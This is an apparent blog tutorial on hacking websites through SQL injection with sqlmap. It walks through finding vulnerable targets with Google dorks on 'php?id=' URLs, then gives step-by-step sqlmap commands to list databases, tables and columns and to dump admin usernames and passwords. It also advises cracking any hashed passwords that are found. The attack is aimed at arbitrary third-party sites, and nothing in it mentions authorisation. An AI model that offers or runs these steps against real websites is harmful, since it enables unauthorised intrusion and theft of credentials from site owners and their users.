What is SQL injection attack? examples & tutorials | SQL injection tutorial

 

 How to install SQLMAP in termux?


What is sqlmap?

SQLMAP is an open-source tool that automatically detect and exploits SQL injection bug. by doing a SQL injection attack, an attacker can take over and manipulate a database on server. So from that we can steal or retrieve a database from a website that we want for example, we can retrieve website admin id and password from database.

How to use SQLinjection?


First of all you can hack the websites that have SQL injection vulnerability. Now you might be thinking about how to find a website that’s has SQL injection vulnerability.
You can use google dorks in order to find out SQL injection vulnerability in the website. Most of the website have SQL injection vulnerability start with php?id=1 or any kind of value after php?id=
example:
                php?id=1
                php?id=2 or any number
                Php?cat=1
                php?cat=60 or any number

Now let’s start how to hack the website using SQLMAP

step 1: 

 First we check if the website is vulnerable or not. This blow command help you to find website vulnerability 

pyhton2 sqlmap.py -u <your website>

 

If that website vulnerable means the result will be show blow image

Step 2:

Now we find website data base This command will help you to find out the database of the website.

python2 sqlmap.py -u <your website > –dbs

 

now we have output like this 

*hkwaitat_db

*information_schima

Step 3: 

Now our next step is to find tables that are present in the database with the following command.

python2 sqlmap.py -u <your website> -D <database name> –tables

mostly choose the database is end with db because that’s only have the username and password.

example:

              I find two database.but I choose only “hkwaitat_db” because this only have more information.

or else you will see information schema don’t wast your time in finding credentials or any juicy information in that schema because information schema is of no use.

still we see the tables like above image then we find columns under the table (your wish ) 

Step 4: 

Still we know the database and tables. Now we dump the table values we can get column.
Example:
               we find the username and password under the column. Type this blow format.

python2 sqlmap.py -D <database value> -T <table value> –column

This above commands tells sqlmap to find out column under the table admin. 

 

Step 5:

Still we get database,tables,column then we dumb the column value to get exact information of database. Type this blow format of commands.

python2 sqlmap.py -D <database value> -T <table value> -C <column value> –dump

This above commands will save the exact output in text format in your device.

 

If you find password the password may be in an encrypted from such as MD5 most of the password are in text from. if the password is encrypted then you need to decrypt the password using findmyhase or any other program which is used to decrypt the password.

Conclusion.

There are millions of website available on the internet which have SQL injection vulnerability. This vulnerability caused by a lake of knowledge of website developers. To overcome this vulnerability some developers must know how to be safe from SQL injection.

Full Tutorial Video:


Leave a Reply

Your email address will not be published. Required fields are marked *

x